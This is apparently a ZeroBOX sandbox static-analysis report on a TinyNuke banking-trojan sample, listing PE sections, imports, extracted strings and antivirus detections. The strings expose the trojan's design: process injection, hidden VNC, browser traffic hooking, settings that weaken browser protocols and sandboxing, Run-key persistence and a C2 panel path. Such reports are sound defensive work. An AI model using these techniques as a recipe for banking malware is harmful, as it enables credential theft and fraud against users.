Static | ZeroBOX

PE Compile Time

2024-07-07 22:06:01

PE Imphash

efe9c653199957170a92ef694ca6f2f1

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00011c99    0x00011e00        6.58163602035
.rdata  0x00013000       0x0000766e    0x00007800        5.00451560148
.data   0x0001b000       0x000020d0    0x00000a00        2.371180618
.rsrc   0x0001e000       0x000001e0    0x00000200        4.71006138269
.reloc  0x0001f000       0x00001b08    0x00001c00        6.64527861539

Resources

Name         Offset      Size        Language      Sub-language        File type
RT_MANIFEST  0x0001e060  0x0000017d  LANG_ENGLISH  SUBLANG_ENGLISH_US  XML 1.0 document text

Imports

Library KERNEL32.dll:
0x413000 GetProcAddress
0x413004 LoadLibraryA
0x413008 CreateFileA
0x41300c GetFileSize
0x413010 ReadFile
0x413014 CloseHandle
0x413018 Sleep
0x41301c TerminateProcess
0x413020 OpenProcess
0x413024 lstrcatA
0x41302c Process32First
0x413030 Process32Next
0x41303c WaitForSingleObject
0x413040 GetConsoleWindow
0x413044 WriteConsoleW
0x413048 CreateFileW
0x413054 GetCurrentProcess
0x41305c IsDebuggerPresent
0x413060 GetStartupInfoW
0x413064 GetModuleHandleW
0x41306c GetCurrentProcessId
0x413070 GetCurrentThreadId
0x413078 InitializeSListHead
0x41307c RaiseException
0x413080 GetLastError
0x413084 SetLastError
0x41308c RtlUnwind
0x413094 TlsAlloc
0x413098 TlsGetValue
0x41309c TlsSetValue
0x4130a0 TlsFree
0x4130a4 FreeLibrary
0x4130a8 LoadLibraryExW
0x4130ac ExitProcess
0x4130b0 GetModuleHandleExW
0x4130b4 GetModuleFileNameW
0x4130b8 GetStdHandle
0x4130bc WriteFile
0x4130c0 GetCommandLineA
0x4130c4 GetCommandLineW
0x4130c8 HeapAlloc
0x4130cc HeapFree
0x4130d0 FindClose
0x4130d4 FindFirstFileExW
0x4130d8 FindNextFileW
0x4130dc IsValidCodePage
0x4130e0 GetACP
0x4130e4 GetOEMCP
0x4130e8 GetCPInfo
0x4130ec MultiByteToWideChar
0x4130f0 WideCharToMultiByte
0x413100 CompareStringW
0x413104 LCMapStringW
0x413108 GetProcessHeap
0x41310c GetFileType
0x413110 SetStdHandle
0x413114 GetStringTypeW
0x413118 HeapSize
0x41311c HeapReAlloc
0x413120 FlushFileBuffers
0x413124 GetConsoleCP
0x413128 GetConsoleMode
0x41312c SetFilePointerEx
0x413130 DecodePointer
Library USER32.dll:
0x413138 ShowWindow

!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
127.0.0.1
/panel/client.php
User32.dll
Kernel32.dll
KernelBase.dll
msvcrt.dll
ntdll.dll
Shlwapi.dll
Shell32.dll
Secur32.dll
Advapi32.dll
ws2_32.dll
version.dll
Psapi.dll
wininet.dll
gdi32.dll
MessageBoxA
GetWindowsDirectoryA
WideCharToMultiByte
LocalAlloc
wsprintfA
MultiByteToWideChar
malloc
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
LoadLibraryA
GetProcAddress
PathRemoveFileSpecA
GetModuleFileNameA
PathFindFileNameA
strncmp
_strnicmp
lstrlenA
ExitProcess
SHGetFolderPathA
lstrcpyA
lstrcatA
CopyFileA
GetVolumeInformationA
GetUserNameExA
LookupAccountNameA
ConvertSidToStringSidA
LocalFree
lstrcmpiA
lstrcmpA
StrStrA
StrStrIA
strtol
realloc
WSAStartup
socket
gethostbyname
connect
closesocket
WSACleanup
memset
memcpy
NtOpenKey
NtSetValueKey
CloseHandle
CreateProcessA
NtCreateThreadEx
TerminateProcess
FindWindowA
NtUnmapViewOfSection
NtQueryInformationProcess
GetThreadContext
SetThreadContext
SHFileOperationA
FindFirstFileA
FindNextFileA
GetWindowThreadProcessId
InitializeCriticalSection
GetLastError
EnterCriticalSection
LeaveCriticalSection
_errno
tolower
isdigit
strtoul
isxdigit
strtod
CreateToolhelp32Snapshot
Process32First
Process32Next
StrChrA
StrToIntA
GetModuleHandleA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
GetModuleInformation
memcmp
ExpandEnvironmentStringsA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
CreateFileA
ReadFile
WriteFile
RegSetValueExA
RegOpenKeyExA
RegCloseKey
GetFileSize
ResumeThread
IsWow64Process
GetNativeSystemInfo
OpenProcess
CreateThread
GetUserNameW
GetComputerNameW
GetVersionExA
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
InternetCrackUrlA
GetTempPathA
GetTempFileNameA
ShellExecuteA
ioctlsocket
CreateMutexA
ReleaseMutex
WaitForSingleObject
EnumWindows
GetCurrentProcessId
DeleteFileA
PathFileExistsA
CreateDirectoryA
HttpQueryInfoA
HttpQueryInfoW
RtlCompressBuffer
RtlGetCompressionWorkSpaceSize
SetThreadDesktop
CreateDesktopA
OpenDesktopA
TerminateThread
PostMessageA
SendMessageA
ChildWindowFromPoint
ScreenToClient
MoveWindow
GetWindowRect
GetMenuItemID
MenuItemFromPoint
RealGetWindowClassA
PtInRect
GetWindowPlacement
SetWindowLongA
GetWindowLongA
WindowFromPoint
SHAppBarMessage
RegQueryValueExA
GetDesktopWindow
DeleteDC
ReleaseDC
DeleteObject
GetDIBits
StretchBlt
SetStretchBltMode
SelectObject
CreateCompatibleDC
CreateCompatibleBitmap
IsWindowVisible
GetWindow
PrintWindow
GetTopWindow
RtlInitAnsiString
RtlAnsiStringToUnicodeString
LdrLoadDll
LdrGetProcedureAddress
RtlFreeUnicodeString
RtlCreateUserThread
Hello World
HTTP/1.1
Host:
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length:
HTTP/1.1 200 OK
Content-Length
Transfer-Encoding
chunked
\Registry\User\%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
dllhost.exe
bin|int32
bin|int64
explorer.exe
firefox.exe
chrome.exe
iexplore.exe
powershell -noexit -command "[console]::windowwidth = 100;[console]::windowheight = 30; [console]::bufferwidth = [console]::windowwidth"
msedge.exe
brave.exe
injects
Firefox
Chrome
Internet Explorer
chrome.dll
BitBlt
nss3.dll
nspr4.dll
PR_Read
PR_Write
.rdata
Content-Length:
Accept-Encoding
identity
Connection
Content-Type:
text/html
Location:
X-HeyThere: 5eYEp80n3hM
Host:
http(s)://
log|%s|%s|%d|
<!DOCTYPE
<script>window.location.href = window.location.href;</script>
InternetCloseHandle
InternetQueryDataAvailable
HttpOpenRequestW
InternetConnectW
HttpSendRequestW
InternetReadFile
InternetReadFileExW
InternetWriteFile
%appdata%
%s\%s\%s\%s.ini
Mozilla
Profiles
Profile
%s\%s\%s\%s\%s\%s.js
network.http.spdy.enabled
browser.tabs.remote.autostart
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);
Software\Microsoft\Internet Explorer\Main
TabProcGrowth
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
--disable-http2 --use-spdy=off --disable-quic
CreateProcessInternalW
NoProtectedModeBanner
#32768
\rundll32.exe shell32.dll,#61
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
TaskbarGlomLevel
profiles.ini
-profile
\Google\Chrome\
cmd.exe /c start
--no-sandbox --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=
User Data\
\Mozilla\Firefox\
IsRelative=
-no-remote -profile
info|%d|%d|%s|%s|%d|%d
\\.\pipe\%s
As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.
Shell_TrayWnd
verclsid.exe
child.dll
:Zone.Identifier
Trusteer
hVNC_Rules
Button
%08lX%04lX%lu
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Unknown exception
bad array new length
?456789:;<=
 !"#$%&'()*+,-./0123
invalid string position
string too long
bad allocation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
.text$di
.text$mn
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
GetProcAddress
LoadLibraryA
CreateFileA
GetFileSize
ReadFile
CloseHandle
TerminateProcess
OpenProcess
lstrcatA
CreateToolhelp32Snapshot
Process32First
Process32Next
EnterCriticalSection
LeaveCriticalSection
WaitForSingleObject
GetConsoleWindow
KERNEL32.dll
ShowWindow
USER32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
GetLastError
SetLastError
DeleteCriticalSection
RtlUnwind
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
CompareStringW
LCMapStringW
GetProcessHeap
GetFileType
SetStdHandle
GetStringTypeW
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetFilePointerEx
CreateFileW
WriteConsoleW
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Aja-JP
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Antivirus Signature
Bkav W32.Common.DA4A577B
Lionic Trojan.Win32.Tinukebot.7!c
Elastic malicious (high confidence)
ClamAV Win.Malware.Tinukebot-10031688-0
CMC Clean
CAT-QuickHeal Trojan.Tinynuke
Skyhigh BehavesLike.Win32.Generic.ch
ALYac Generic.Tinukebot.1.7FD095A4
Cylance Unsafe
Zillya Trojan.Tinukebot.Win32.358
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanBanker:Win32/TinyNuke.0a8008c0
K7GW Trojan ( 0050f9fa1 )
K7AntiVirus Trojan ( 0050f9fa1 )
huorong Backdoor/Zbot.c
Baidu Clean
VirIT Trojan.Win32.Genus.XLT
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Tinukebot.B
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Banker.Win32.TinyNuke.gen
BitDefender Generic.Tinukebot.1.7FD095A4
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Tinukebot.115200
MicroWorld-eScan Generic.Tinukebot.1.7FD095A4
Tencent Trojan.Win32.Agent.16001546
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.TinyNuke.xbdrr
DrWeb Clean
VIPRE Generic.Tinukebot.1.7FD095A4
TrendMicro TROJ_TINUKE.SM1
McAfeeD ti!4D2AF9283F59
Trapmine Clean
CTX exe.trojan.tinynuke
Emsisoft Generic.Tinukebot.1.7FD095A4 (B)
Ikarus Trojan.Win32.Tinukebot
FireEye Generic.mg.b7e00e7be81fefb7
Jiangmin Clean
Webroot Clean
Varist W32/Agent.JDK.gen!Eldorado
Avira TR/AVI.TinyNuke.xbdrr
Fortinet W32/Tinukebot.B!tr
Antiy-AVL Trojan[Banker]/Win32.TinyNuke
Kingsoft malware.kb.a.936
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Tinukebot.1.7FD095A4
SUPERAntiSpyware Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Tinuke.C5684702
Acronis suspicious
McAfee Artemis!B7E00E7BE81F
TACHYON Clean
VBA32 Clean
Malwarebytes Malware.AI.2411681091
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_TINUKE.SM1
Rising Trojan.TinyNuke!1.B70D (CLASSIC)
Yandex Trojan.Tinukebot!FwBIi7vKH3c
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData Generic.Tinukebot.1.7FD095A4
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Backdoor:Win/Tinukebot.A
No IRMA results available.